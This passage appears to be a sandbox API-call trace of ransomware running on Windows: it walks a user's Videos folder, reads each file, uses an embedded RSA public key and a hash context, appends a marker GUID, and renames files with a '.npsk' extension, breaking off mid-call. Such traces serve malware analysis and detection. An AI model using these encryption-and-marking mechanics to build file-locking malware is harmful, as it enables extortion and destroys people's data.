CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.016] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.016] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.016] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.016] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.016] GetLastError () returned 0x0 [0216.016] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.016] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.016] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.016] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.016] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.016] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.017] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x81df, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.017] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.017] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.017] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.017] CloseHandle (hObject=0x61c) returned 1 [0216.019] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BGVUfXjkkn.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bgvufxjkkn.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BGVUfXjkkn.mp4.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bgvufxjkkn.mp4.npsk")) returned 1 [0216.021] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54adc370, ftCreationTime.dwHighDateTime=0x1d5e143, ftLastAccessTime.dwLowDateTime=0xef839810, ftLastAccessTime.dwHighDateTime=0x1d5d91f, ftLastWriteTime.dwLowDateTime=0xef839810, ftLastWriteTime.dwHighDateTime=0x1d5d91f, nFileSizeHigh=0x0, nFileSizeLow=0xa97c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CF_TgXEmdwBMS.flv", cAlternateFileName="CF_TGX~1.FLV")) returned 1 [0216.021] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CF_TgXEmdwBMS.flv") returned=".flv" [0216.021] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CF_TgXEmdwBMS.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cf_tgxemdwbms.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.022] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=43388) returned 1 [0216.022] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.024] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa956, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.024] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.025] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xa97c, lpOverlapped=0x0) returned 1 [0216.026] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.026] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.026] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.026] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.027] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.027] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.027] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.027] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.027] GetLastError () returned 0x0 [0216.028] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.028] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.028] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.028] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.028] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.028] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.029] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa97c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.029] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.029] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.029] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.029] CloseHandle (hObject=0x61c) returned 1 [0216.030] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CF_TgXEmdwBMS.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cf_tgxemdwbms.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CF_TgXEmdwBMS.flv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cf_tgxemdwbms.flv.npsk")) returned 1 [0216.032] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0216.032] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned=".ini" [0216.032] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf32366d0, ftCreationTime.dwHighDateTime=0x1d5ddcf, ftLastAccessTime.dwLowDateTime=0xd2935ed0, ftLastAccessTime.dwHighDateTime=0x1d5d87e, ftLastWriteTime.dwLowDateTime=0xd2935ed0, ftLastWriteTime.dwHighDateTime=0x1d5d87e, nFileSizeHigh=0x0, nFileSizeLow=0x115e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dIvWm9TLzkj.swf", cAlternateFileName="DIVWM9~1.SWF")) returned 1 [0216.032] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\dIvWm9TLzkj.swf") returned=".swf" [0216.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\dIvWm9TLzkj.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\divwm9tlzkj.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.033] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=71145) returned 1 [0216.034] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.035] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x115c3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.035] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.037] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x115e9, lpOverlapped=0x0) returned 1 [0216.041] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.041] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.041] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.041] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.042] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.042] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.042] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.043] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.043] GetLastError () returned 0x0 [0216.043] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.043] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.043] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.043] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.043] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.043] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.044] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x115e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.044] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.044] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.044] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.044] CloseHandle (hObject=0x61c) returned 1 [0216.046] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\dIvWm9TLzkj.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\divwm9tlzkj.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\dIvWm9TLzkj.swf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\divwm9tlzkj.swf.npsk")) returned 1 [0216.048] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf04b65a0, ftCreationTime.dwHighDateTime=0x1d5db74, ftLastAccessTime.dwLowDateTime=0xe5165b20, ftLastAccessTime.dwHighDateTime=0x1d5d9a0, ftLastWriteTime.dwLowDateTime=0xe5165b20, ftLastWriteTime.dwHighDateTime=0x1d5d9a0, nFileSizeHigh=0x0, nFileSizeLow=0x6389, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DnQ7WF.mp4", cAlternateFileName="")) returned 1 [0216.048] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DnQ7WF.mp4") returned=".mp4" [0216.048] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DnQ7WF.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dnq7wf.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.049] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=25481) returned 1 [0216.049] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.051] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x6363, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.051] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.053] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x6389, lpOverlapped=0x0) returned 1 [0216.053] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.054] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.054] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.054] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.055] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.055] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.055] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.055] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.055] GetLastError () returned 0x0 [0216.055] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.055] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.055] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.055] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.055] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.055] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.056] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x6389, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.056] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.056] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.056] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.056] CloseHandle (hObject=0x61c) returned 1 [0216.058] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DnQ7WF.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dnq7wf.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DnQ7WF.mp4.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dnq7wf.mp4.npsk")) returned 1 [0216.060] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96674590, ftCreationTime.dwHighDateTime=0x1d5dd45, ftLastAccessTime.dwLowDateTime=0xe30aeb50, ftLastAccessTime.dwHighDateTime=0x1d5d84e, ftLastWriteTime.dwLowDateTime=0xe30aeb50, ftLastWriteTime.dwHighDateTime=0x1d5d84e, nFileSizeHigh=0x0, nFileSizeLow=0x2ce4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hBKhvUWd9C_s.mkv", cAlternateFileName="HBKHVU~1.MKV")) returned 1 [0216.060] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hBKhvUWd9C_s.mkv") returned=".mkv" [0216.060] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hBKhvUWd9C_s.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hbkhvuwd9c_s.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.060] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=11492) returned 1 [0216.060] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.062] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2cbe, lpNewFilePointer=0x0, 